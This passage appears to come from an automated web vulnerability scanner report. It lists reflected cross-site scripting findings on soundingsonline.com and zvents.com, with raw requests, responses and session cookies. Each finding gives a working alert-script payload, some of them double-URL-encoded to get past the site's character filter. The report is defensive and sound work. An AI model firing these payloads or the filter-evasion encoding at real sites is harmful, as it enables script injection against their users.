Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/coastwise?51b8e"><script>alert(1)</script>c5c8ce41216=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.900. http://www.soundingsonline.com/news/dispatches [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/dispatches

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2aa18%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5ffa1ffcd40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2aa18"><script>alert(1)</script>5ffa1ffcd40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /news/dispatches?2aa18%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5ffa1ffcd40=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/dispatches?2aa18"><script>alert(1)</script>5ffa1ffcd40=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.901. http://www.soundingsonline.com/news/home-waters [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/home-waters

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1ee0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e19a87dc7b6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c1ee0"><script>alert(1)</script>19a87dc7b6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /news/home-waters?c1ee0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e19a87dc7b6e=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/home-waters?c1ee0"><script>alert(1)</script>19a87dc7b6e=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.902. http://www.soundingsonline.com/news/mishaps-a-rescues [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc446%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74fbf294bd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc446"><script>alert(1)</script>74fbf294bd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /news/mishaps-a-rescues?fc446%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74fbf294bd7=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

4.903. http://www.soundingsonline.com/news/mishaps-a-rescues/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 575f4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec6b2abc3a30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 575f4"><script>alert(1)</script>c6b2abc3a30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /news/mishaps-a-rescues/index.php?575f4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec6b2abc3a30=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

4.904. http://www.soundingsonline.com/news/sailing [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/sailing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24feb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e96ffec7c22a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 24feb"><script>alert(1)</script>96ffec7c22a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /news/sailing?24feb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e96ffec7c22a=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

4.905. http://www.soundingsonline.com/news/todays-top-stories [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/todays-top-stories

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7919d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cd07914ed6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7919d"><script>alert(1)</script>5cd07914ed6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /news/todays-top-stories?7919d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cd07914ed6=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/todays-top-stories?7919d"><script>alert(1)</script>5cd07914ed6=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.906. http://www.soundingsonline.com/resources [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/resources

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb978%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8bf595a39d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fb978"><script>alert(1)</script>a8bf595a39d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /resources?fb978%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8bf595a39d=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

4.907. http://www.soundingsonline.com/site-map [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/site-map

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17af3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2f10cb93dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17af3"><script>alert(1)</script>2f10cb93dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /site-map?17af3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2f10cb93dd=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

4.908. http://www.soundingsonline.com/subscription-services [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/subscription-services

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9451c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c5155b61bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9451c"><script>alert(1)</script>3c5155b61bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /subscription-services?9451c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c5155b61bf=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/subscription-services?9451c"><script>alert(1)</script>3c5155b61bf=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.909. http://www.soundingsonline.com/subscription-services/preview-current-issue [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/subscription-services/preview-current-issue

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4df85%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb520f082cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4df85"><script>alert(1)</script>bb520f082cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /subscription-services/preview-current-issue?4df85%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb520f082cd=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

4.910. http://www.zvents.com/ [376e5%22%3E%3Cscript%3Ealert(1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.zvents.com
Path:	/

Issue detail

The value of the 376e5%22%3E%3Cscript%3Ealert(1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afd8e"><script>alert(1)</script>bb5d19de2cf was submitted in the 376e5%22%3E%3Cscript%3Ealert(1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?376e5%22%3E%3Cscript%3Ealert(1afd8e"><script>alert(1)</script>bb5d19de2cf HTTP/1.1
Host: www.zvents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 04:48:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 33
ETag: "1996f06a2e07b0675d817a21c21d6f9e"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiCWNpdHkiC0RhbGxhcyILcmFkaXVzaVAiDWxhdGl0dWRlZhczMi43ODI1MDEyMjA3MDMxMjUiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBQiCnN0YXRlIgdUWA%3D%3D--e5ccfcada25365dd2467a440cdadee91225f4fd0; path=/; expires=Fri, 29-Apr-2011 04:48:08 GMT; HttpOnly
Content-Length: 62918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?376e5%22%3E%3Cscript%3Ealert(1afd8e"><script>alert(1)</script>bb5d19de2cf" />
...[SNIP]...

4.911. http://www.zvents.com/ [376e5%22%3E%3Cscript%3Ealert(document.cookie parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.zvents.com
Path:	/

Issue detail

The value of the 376e5%22%3E%3Cscript%3Ealert(document.cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb4e6"><script>alert(1)</script>1714e2f256f was submitted in the 376e5%22%3E%3Cscript%3Ealert(document.cookie parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?376e5%22%3E%3Cscript%3Ealert(document.cookiefb4e6"><script>alert(1)</script>1714e2f256f HTTP/1.1
Host: www.zvents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 04:48:27 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 34
ETag: "983e4d4869c500313b472ca776606e37"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiCWNpdHkiC0RhbGxhcyILcmFkaXVzaVAiDWxhdGl0dWRlZhczMi43ODI1MDEyMjA3MDMxMjUiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBQiCnN0YXRlIgdUWA%3D%3D--e5ccfcada25365dd2467a440cdadee91225f4fd0; path=/; expires=Fri, 29-Apr-2011 04:48:27 GMT; HttpOnly
Content-Length: 62974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?376e5%22%3E%3Cscript%3Ealert(document.cookiefb4e6"><script>alert(1)</script>1714e2f256f" />
...[SNIP]...

4.912. http://www.zvents.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.zvents.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afd62"><script>alert(1)</script>659b6a21bfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?afd62"><script>alert(1)</script>659b6a21bfe=1 HTTP/1.1
Host: www.zvents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 04:48:30 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 30
ETag: "ec47c2b56e06d226fbb0ee0a0d0fa4a1"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiCWNpdHkiC0RhbGxhcyILcmFkaXVzaVAiDWxhdGl0dWRlZhczMi43ODI1MDEyMjA3MDMxMjUiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBQiCnN0YXRlIgdUWA%3D%3D--e5ccfcada25365dd2467a440cdadee91225f4fd0; path=/; expires=Fri, 29-Apr-2011 04:48:30 GMT; HttpOnly
Content-Length: 62790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?afd62"><script>alert(1)</script>659b6a21bfe=1" />
...[SNIP]...

4.913. http://www.zvents.com/albany-ny/events [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.zvents.com
Path:	/albany-ny/events

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de173"><a>1d1177c0c73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /albany-nyde173"><a>1d1177c0c73/events HTTP/1.1
Host: www.zvents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 04:49:15 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 148
ETag: "3ca747f019156d48c7cd6ff3a402b354"
Cache-Control: must-revalidate, private, max-age=0
